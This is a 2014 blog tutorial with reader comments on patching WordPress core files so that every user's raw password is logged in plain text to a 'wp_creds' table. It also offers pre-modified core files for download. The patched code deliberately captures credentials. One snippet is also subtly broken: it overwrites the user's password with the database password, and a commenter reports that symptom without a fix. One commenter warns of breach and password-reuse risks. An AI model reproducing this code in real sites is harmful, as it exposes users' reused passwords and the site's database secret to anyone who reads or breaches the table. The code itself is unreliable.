Store Your WordPress Users Raw Password

WordPress stores MD5 hash values of password. So therefore it is almost impossible to retrieve the raw password of the users. But there is a way to store the raw passwords in different place during user registration and password updating. This is what I am going to show you in this article.

If you are already having a running site with registered users then there is only one way to get users passwords i.e., after implementing the code of this article you need to send a email or display a notification to them to change their passwords. Once they update their passwords you will have the raw passwords.

If you are starting a site then this article is perfect for you. All the raw passwords of your new users will be stored in a different place only for you.

Logic To Capture Raw Passwords

We can change the implementation of wp_update_user, wp_create_user and wp_set_password functions to log the password into a different table in wordpress. wp_update_user and wp_create_user are present in wp-includes/user.php file. wp_set_password is present in wp-includes/pluggable.php file.

WordPress 3.9.2

If you are using WordPress 3.9.2 then just download the modified pluggable.php and user.php files and replace it with original ones.

Download

Other Versions

If you using other versions then also you can try to replace the files with the one I provided. I have tested those files in WordPress 3.9.2 only therefore I am not sure whether it will worl in other versions or not. In case you face problems/errors during creating users, updating password and forgot password, then follow these steps to manually edit the original files:

Go to your wp-includes/pluggable.php file. Find the function body of wp_set_password function. Add this code to the beginning of the function.
global $wpdb;

$creds = $wpdb->prefix . "creds";
$username = DB_USER;
$password = DB_PASSWORD;
$hostname = DB_HOST;
$con=mysqli_connect($hostname,$username,$password);

$sql_1 = "USE " . DB_NAME . ";";
mysqli_query($con, $sql_1);

$sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
userid varchar(50) NOT NULL,
PRIMARY KEY(userid),
password varchar(100) NOT NULL
);";
mysqli_query($con, $sql_2);
mysqli_close($con);

if($wpdb->update($creds, array("password" => $password), array("userid" => $user_id), array("%s"), array("%s")) == false)
{
$wpdb->insert($creds, array("password" => $password, "userid" => $user_id), array('%s', '%s'));
}
Go to your wp-includes/user.php file. Find the function body of wp_update_user function. Inside the function body find the condition if ( ! empty($userdata[‘user_pass’]) ). Inside it in the beginning place this code
global $wpdb;
$creds = $wpdb->prefix . "creds";
$username = DB_USER;
$password = DB_PASSWORD;
$hostname = DB_HOST;
$con=mysqli_connect($hostname,$username,$password);

if (mysqli_connect_errno()) {
echo "Failed to connect to MySQL: " . mysqli_connect_error();
die();
}

$sql_1 = "USE " . DB_NAME . ";";
mysqli_query($con,$sql_1);

$sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
userid varchar(50) NOT NULL,
PRIMARY KEY(userid),
password varchar(100) NOT NULL
);";
mysqli_query($con, $sql_2);
mysqli_close($con);

if($wpdb->update($creds, array("password" => $userdata['user_pass']), array("userid" => $ID), array("%s"), array("%s")) == false)
{
$wpdb->insert($creds, array("password" => $userdata['user_pass'], "userid" => $ID), array('%s', '%s'));
}
Now find the function body of wp_insert_user function. Inside it find the comment // Hash the password. Below the comment place this line of code
$original_password = $user_pass;
Now find this line of code $user = new WP_User( $user_id );. Just before it place this code
if($original_password)
{
global $wpdb;

$creds = $wpdb->prefix . "creds";
$username = DB_USER;
$password = DB_PASSWORD;
$hostname = DB_HOST;
$con=mysqli_connect($hostname,$username,$password);

$sql_1 = "USE " . DB_NAME . ";";
mysqli_query($con, $sql_1);

$sql_2 = "CREATE TABLE IF NOT EXISTS $creds (
userid varchar(50) NOT NULL,
PRIMARY KEY(userid),
password varchar(100) NOT NULL
);";
mysqli_query($con, $sql_2);
mysqli_close($con);

if($wpdb->update($creds, array("password" => $original_password), array("userid" => $user_id), array("%s"), array("%s")) == false)
{
$wpdb->insert($creds, array("password" => $original_password, "userid" => $user_id), array('%s', '%s'));
}
}

Where to find raw password

Once you have done the file modification successfully. Try to create new users and update password. If you are not getting any error then in your DBMS you will see a new table named as wp_creds storing all user ids and raw passwords.

Sep 30, 2014Narayan Prusty

Comments: 10

monografia modelos
5 years ago
That is very attention-grabbing, You’re an overly skilled blogger.
I have joined your feesd and look forwaed to searching foor extra
of your greqt post. Additionally, I have shared your webszite in my sociaal
networks
Reply Cancel
Fenix
5 years ago
Hello Narayan,
I implemented the code and due, but I need a password keeper at the time of creating the account and not in the password update. Can you help me?
Reply Cancel
facebook hacker 2017
5 years ago
Great information. Lucky me I recently found your website by chance (stumbleupon).
I’ve saved as a favorite for later!
Reply Cancel
Muhammad Adnan
6 years ago
The above code is working perfect. But I want when a user create then raw password saved in data base, when he update password, forgot password etc. Every time raw password same in that table. I hope this make sense.
Actually I have 2 websites, my client want now when user register on web1.com one it automatically registered on web2.com.
I’m getting the password from web1.com and sending all data to web2.com on user create function of wordpress. So that’s why I really need it. Please help me how this will work.
I just want when ever password update in users table, it also update the $creds table password.
Thanks in advance
Reply Cancel
Anon
6 years ago
You can’t post articles like this and then put in your bio:
“Narayan is an expert in Web Development, Intel XDK, WordPress and Web Security”
Reply Cancel
Nikola Nikolov
7 years ago
Please don’t do that – ever.
Why would you store the user’s password in plain text? What if your site gets hacked and their passwords leaked? What if they are like most regular users and use the same password in multiple places(including things like social media and worse – financial websites like PayPal, or some online banking, etc.)?
You don’t warn your readers that storing raw passwords is a bad idea – you should probably do that.
Also to point out – modifying core files is never a good idea anyway…
Reply Cancel
- Narayan Prusty
  7 years ago
  You’re right Nikola.
  I will add edit the post and put code to encrypt the password.
  Regarding editing core files, there is no other way to store the raw passwords. WordPress has done enough to make sure admins don’t see users raw password.
  Reply Cancel
acrobal
7 years ago
The problem comes from wp_set_password function. I tried to test with
require(‘wp-load.php’ );
global $wpdb;
$subscriber = $wpdb->get_results( “SELECT * FROM `wp_usermeta` WHERE `meta_value` LIKE ‘a:1:{s:10:”subscriber”;b:1;}'” );
foreach($subscriber AS $s) {
wp_set_password(‘testexample’, $s->user_id);
}
to change all passwords for a group and instead testexample I have fcfQTpXG5@ in database.
Thank you.
Reply Cancel
- Narayan Prusty
  7 years ago
  I have tried all the above code it works for me. I would recommend you to do some debugging.
  Reply Cancel
acrobal
7 years ago
Thanks nice add, I have a question about I tried it. It’s working well but I have a problem when I use the “forget link to reset password”. When I change password , password store in database is not the same. Thank you very much
Reply Cancel